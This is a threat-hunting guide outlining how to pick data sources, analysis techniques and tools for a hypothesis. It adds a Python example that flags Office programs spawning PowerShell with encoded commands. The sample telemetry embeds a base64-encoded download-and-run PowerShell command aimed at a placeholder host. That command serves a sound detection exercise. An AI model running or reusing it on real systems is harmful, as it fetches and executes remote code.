Formulate
Identify the data sources needed for the hunt, based on the hypothesis
Determine the analysis techniques needed to answer the question the hypothesis poses
Understand the tools required to gather and analyze that data
Data sources
Identify relevant data sources, based on developed hypotheses:
Evaluate potential data sources in the environment
Determine if a specific data source offers any evidence for the hypotheses
Validate feasibility for collection of data from the data sources
Analysis techniques
Identify which analysis techniques should be used:
Determine which adversary tactics, techniques and procedures (TTPs) the hunt is looking for, and pick techniques that can expose them in the data (for example stacking/frequency analysis, clustering, grouping or searching for known indicators)
Selection criteria should be driven by the developed hypotheses
The chosen analysis techniques should answer the questions raised by the hypotheses
Tools
After identifying the data sources and analysis techniques, the next step is to scope the tools needed for the hunt
Here are some examples:
Security Information and Event Management (SIEM)
Sniffing, IDS/IPS and process monitoring tools
e.g. Wireshark, Snort, Process Monitor (procmon)
Packet capture solutions
Data loss prevention (DLP) solutions
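As an added worked example (not part of the original page), here is one hypothesis carried through all three steps: the data source is process-creation telemetry, the analysis technique is stacking of parent/child process pairs plus an indicator match on the command line, and the script stands in for the SIEM query you would otherwise run. The hypothesis, the host names, the process paths, the command lines and the encoded payload are all assumptions constructed for the illustration; only the field names follow Sysmon Event ID 1.

```python
"""Worked example of the Formulate phase for a single hunt hypothesis.

Hypothesis (assumed for this example): an adversary is achieving execution by
having an Office application spawn PowerShell with an encoded command.
Data source:        process-creation events (Sysmon Event ID 1 field names)
Analysis technique: stacking (frequency analysis) of parent/child process pairs
                    to surface rare lineages, plus an indicator match on the
                    command line for PowerShell's -EncodedCommand switch
Tool:               this script stands in for the SIEM query or notebook
"""
import base64
import re
from collections import Counter

# The payload is built here only so the constructed sample below is a valid
# -EncodedCommand argument (PowerShell expects base64 of UTF-16LE text).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed sample telemetry; hosts, paths and command lines are made up,
# only the field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"Computer": "ws01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe"},
    {"Computer": "ws02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe"},
    {"Computer": "ws03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "WINWORD.EXE /n"},
    {"Computer": "ws01", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"Computer": "ws02", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"Computer": "ws04", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"Computer": "ws03",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -ec {ENCODED}"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...);
# requiring whitespace after the switch keeps -ExecutionPolicy from matching.
ENCODED_SWITCH = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(image_path):
    """Normalise a Windows image path to its lower-cased file name."""
    return image_path.rsplit("\\", 1)[-1].lower()


def stack_parent_child(events):
    """Stacking: count how often each (parent, child) process pair occurs."""
    return Counter((basename(e["ParentImage"]), basename(e["Image"])) for e in events)


def rare_pairs(counts, max_count=1):
    """Pairs seen at most max_count times; rare lineages are where the hunter looks first."""
    return sorted(pair for pair, n in counts.items() if n <= max_count)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENCODED_SWITCH.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Answer the hypothesis: Office parent -> PowerShell child, with the payload decoded."""
    findings = []
    for e in events:
        parent, child = basename(e["ParentImage"]), basename(e["Image"])
        if parent in OFFICE_APPS and child in POWERSHELL:
            findings.append({
                "Computer": e["Computer"],
                "Parent": parent,
                "DecodedCommand": decode_encoded_command(e["CommandLine"]),
            })
    return findings


if __name__ == "__main__":
    counts = stack_parent_child(SAMPLE_EVENTS)
    print("Rare parent/child pairs:", rare_pairs(counts))
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The stacking step is deliberately kept separate from the indicator match: frequency analysis tells the hunter which lineages are unusual in this environment (here, anything spawned from an Office binary), while the decoder answers the specific question the hypothesis asked. If the rare-pair list is empty for Office parents, the data source was still worth checking; the hypothesis is simply not supported by the telemetry you have.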